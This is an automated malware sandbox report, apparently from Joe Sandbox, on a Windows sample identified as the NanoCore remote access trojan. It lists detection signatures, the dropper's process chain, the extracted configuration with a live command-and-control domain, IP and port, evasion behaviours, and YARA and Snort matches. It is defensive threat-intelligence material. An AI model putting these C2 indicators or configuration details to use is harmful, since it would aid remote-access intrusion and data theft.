Windows Analysis Report
PhviZrlpkW.exe

Overview

General Information

Sample Name: PhviZrlpkW.exe
Analysis ID: 798336
MD5: 565044691fedb39980cb814dc26f9ebd
SHA1: d92f48359c385fd03a419e583495ead52428654e
SHA256: 3a1c1eabfbe52d5a822e95462e730775ea9eef9d8d653f3a1ff6904378ad3e0c
Tags: exeNanoCoreRAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Detected unpacking (creates a PE file in dynamic memory)
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
.NET source code contains potential unpacker
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • PhviZrlpkW.exe (PID: 4624 cmdline: C:\Users\user\Desktop\PhviZrlpkW.exe MD5: 565044691FEDB39980CB814DC26F9EBD)
    • tchnhwrvi.exe (PID: 2120 cmdline: "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Local\Temp\lcrizgqjcc.mo MD5: 64F982758878F6A97ED4B3D99CFBD371)
      • tchnhwrvi.exe (PID: 1312 cmdline: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe MD5: 64F982758878F6A97ED4B3D99CFBD371)
  • edpm.exe (PID: 2468 cmdline: "C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca MD5: 64F982758878F6A97ED4B3D99CFBD371)
    • WerFault.exe (PID: 1256 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • edpm.exe (PID: 5104 cmdline: "C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe" "C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe" C:\Users\user\AppData\Loca MD5: 64F982758878F6A97ED4B3D99CFBD371)
    • WerFault.exe (PID: 3692 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 632 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "fc2f5233-89c0-4cab-99aa-8d389dd5", "Domain1": "thesopranos.duckdns.org", "Domain2": "thesopranos.duckdns.org", "Port": 1365, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Source | Rule | Description | Author | Strings
00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
    00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
    • 0xe91:$a: NanoCore
    • 0xeea:$a: NanoCore
    • 0xf27:$a: NanoCore
    • 0xfa0:$a: NanoCore
    • 0x1464b:$a: NanoCore
    • 0x14660:$a: NanoCore
    • 0x14695:$a: NanoCore
    • 0x222aa:$a: NanoCore
    • 0x222cf:$a: NanoCore
    • 0x22328:$a: NanoCore
    • 0x324c5:$a: NanoCore
    • 0x324eb:$a: NanoCore
    • 0x32547:$a: NanoCore
    • 0x3f39c:$a: NanoCore
    • 0x3f3f5:$a: NanoCore
    • 0x3f428:$a: NanoCore
    • 0x3f654:$a: NanoCore
    • 0x3f6d0:$a: NanoCore
    • 0x3fce9:$a: NanoCore
    • 0x3fe32:$a: NanoCore
    • 0x40306:$a: NanoCore
    00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Nanocore_d8c4e3c5 | unknown | unknown
    • 0xf27:$a1: NanoCore.ClientPluginHost
    • 0x14695:$a1: NanoCore.ClientPluginHost
    • 0x222cf:$a1: NanoCore.ClientPluginHost
    • 0x324eb:$a1: NanoCore.ClientPluginHost
    • 0x3f654:$a1: NanoCore.ClientPluginHost
    • 0x45ba2:$a1: NanoCore.ClientPluginHost
    • 0x4bb73:$a1: NanoCore.ClientPluginHost
    • 0x555df:$a1: NanoCore.ClientPluginHost
    • 0x5fa0a:$a1: NanoCore.ClientPluginHost
    • 0x6a9e7:$a1: NanoCore.ClientPluginHost
    • 0xeea:$a2: NanoCore.ClientPlugin
    • 0x14660:$a2: NanoCore.ClientPlugin
    • 0x222aa:$a2: NanoCore.ClientPlugin
    • 0x324c5:$a2: NanoCore.ClientPlugin
    • 0x3f6d0:$a2: NanoCore.ClientPlugin
    • 0x45c1c:$a2: NanoCore.ClientPlugin
    • 0x4bbbd:$a2: NanoCore.ClientPlugin
    • 0x556c9:$a2: NanoCore.ClientPlugin
    • 0x5faaa:$a2: NanoCore.ClientPlugin
    • 0x6a9be:$a2: NanoCore.ClientPlugin
    • 0x12be:$b1: get_BuilderSettings
    00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
    • 0x26455:$x1: NanoCore.ClientPluginHost
    • 0x26492:$x2: IClientNetworkHost
    • 0x29fc5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
      Source | Rule | Description | Author | Strings
      2.2.tchnhwrvi.exe.4f14bbe.11.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
      • 0x170b:$x1: NanoCore.ClientPluginHost
      • 0x1725:$x2: IClientNetworkHost
      2.2.tchnhwrvi.exe.4f14bbe.11.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth (Nextron Systems)
      • 0x170b:$x2: NanoCore.ClientPluginHost
      • 0x34b6:$s4: PipeCreated
      • 0x16f8:$s5: IClientLoggingHost
      2.2.tchnhwrvi.exe.4f14bbe.11.unpack | MALWARE_Win_NanoCore | Detects NanoCore | ditekSHen
      • 0x16e2:$x2: NanoCore.ClientPlugin
      • 0x170b:$x3: NanoCore.ClientPluginHost
      • 0x16d3:$i3: IClientNetwork
      • 0x16f8:$i6: IClientLoggingHost
      • 0x1725:$i7: IClientNetworkHost
      • 0x154e:$s1: ClientPlugin
      • 0x16eb:$s1: ClientPlugin
      2.2.tchnhwrvi.exe.4f14bbe.11.unpack | Windows_Trojan_Nanocore_d8c4e3c5 | unknown | unknown
      • 0x170b:$a1: NanoCore.ClientPluginHost
      • 0x16e2:$a2: NanoCore.ClientPlugin
      • 0x3a54:$b7: LogClientException
      • 0x16f8:$b9: IClientLoggingHost
      2.2.tchnhwrvi.exe.73f0000.33.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
      • 0x8ba5:$x1: NanoCore.ClientPluginHost
      • 0x8bd2:$x2: IClientNetworkHost

      AV Detection

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, ProcessId: 1312, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, ProcessId: 1312, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Stealing of Sensitive Information

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, ProcessId: 1312, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

      Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, ProcessId: 1312, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      AV Detection

      Source: PhviZrlpkW.exe, ReversingLabs: Detection: 57%
      Source: PhviZrlpkW.exe, Virustotal: Detection: 52%
      Source: thesopranos.duckdns.org, Avira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, ReversingLabs: Detection: 65%
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, Virustotal: Detection: 52%
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe, ReversingLabs: Detection: 65%
      Source: C:\Users\user\AppData\Roaming\ovawcpafrwk\edpm.exe, Virustotal: Detection: 52%
      Source: Yara match, File source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTR
      Source: 2.2.tchnhwrvi.exe.400000.1.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
      Source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, Avira: Label: TR/NanoCore.fadte
      Source: 2.2.tchnhwrvi.exe.441b408.27.unpack, Avira: Label: TR/NanoCore.fadte
      Source: 2.2.tchnhwrvi.exe.3330000.5.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
      Source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: NanoCore

      Compliance

      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, Unpacked PE file: 2.2.tchnhwrvi.exe.3330000.5.unpack
      Source: PhviZrlpkW.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: PhviZrlpkW.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: tchnhwrvi.exe, 00000001.00000003.303187367.000000001AB50000.00000004.00001000.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000003.304084780.000000001A9C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571720723.0000000007590000.00000004.08000000.00040000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: tchnhwrvi.exe, 00000001.00000003.303187367.000000001AB50000.00000004.00001000.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000003.304084780.000000001A9C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\xampp\htdocs\2efa81c4e6b34188a21ceb28fac598e4\Loader\Release\Loader.pdb source: PhviZrlpkW.exe, 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmp, PhviZrlpkW.exe, 00000000.00000002.314365455.0000000002859000.00000004.00000020.00020000.00000000.sdmp, tchnhwrvi.exe, 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp, tchnhwrvi.exe, 00000001.00000000.299162939.0000000000290000.00000002.00000001.01000000.00000004.sdmp, tchnhwrvi.exe, 00000002.00000000.302278058.0000000000290000.00000002.00000001.01000000.00000004.sdmp, edpm.exe, 00000003.00000002.364296668.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000003.00000000.330467592.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000007.00000000.351397609.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe, 00000007.00000002.364278841.00000000001E0000.00000002.00000001.01000000.00000007.sdmp, edpm.exe.1.dr, tchnhwrvi.exe.0.dr, nse83F1.tmp.0.dr
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571793197.00000000075E0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571671329.0000000007570000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571745163.00000000075B0000.00000004.08000000.00040000.00000000.sdmp
      Source: C:\Users\user\Desktop\PhviZrlpkW.exe, Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
      Source: C:\Users\user\Desktop\PhviZrlpkW.exe, Code function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
      Source: C:\Users\user\Desktop\PhviZrlpkW.exe, Code function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exe, Code function: 2_2_00406715 FindFirstFileExW,2_2_00406715

      Networking

      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49691 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49693 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 193.31.30.138:1365 -> 192.168.2.4:49702
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49702 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49712 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49713 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49714 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.2.4:49714 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49715 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49716 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49717 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49718 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49720 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49721 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49722 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49723 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49724 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49725 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.2.4:49725 -> 193.31.30.138:1365
      Source: Traffic, Snort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.4:49726 -> 193.31.30.138:1365
      Source: Malware configuration extractor, URLs: thesopranos.duckdns.org
      Source: unknown, DNS query: name: thesopranos.duckdns.org
      Source: Joe Sandbox View, ASN Name: QUICKPACKETUS QUICKPACKETUS
      Source: global traffic, TCP traffic: 192.168.2.4:49691 -> 193.31.30.138:1365
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.566066458.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.571773496.00000000075D0000.00000004.08000000.00040000.00000000.sdmp, tchnhwrvi.exe, 00000002.00000002.567185811.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://google.com
      Source: PhviZrlpkW.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: tchnhwrvi.exe, 00000002.00000002.566066458.0000000003381000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: unknown, DNS traffic detected: queries for: thesopranos.duckdns.org
      Source: tchnhwrvi.exe, 00000001.00000002.309098073.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: RegisterRawInputDevices
      Source: C:\Users\user\Desktop\PhviZrlpkW.exe, Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

      E-Banking Fraud


      System Summary

      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000003.317149940.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.571812469.00000000075F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
      Source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 00000002.00000002.571761394.00000000075C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
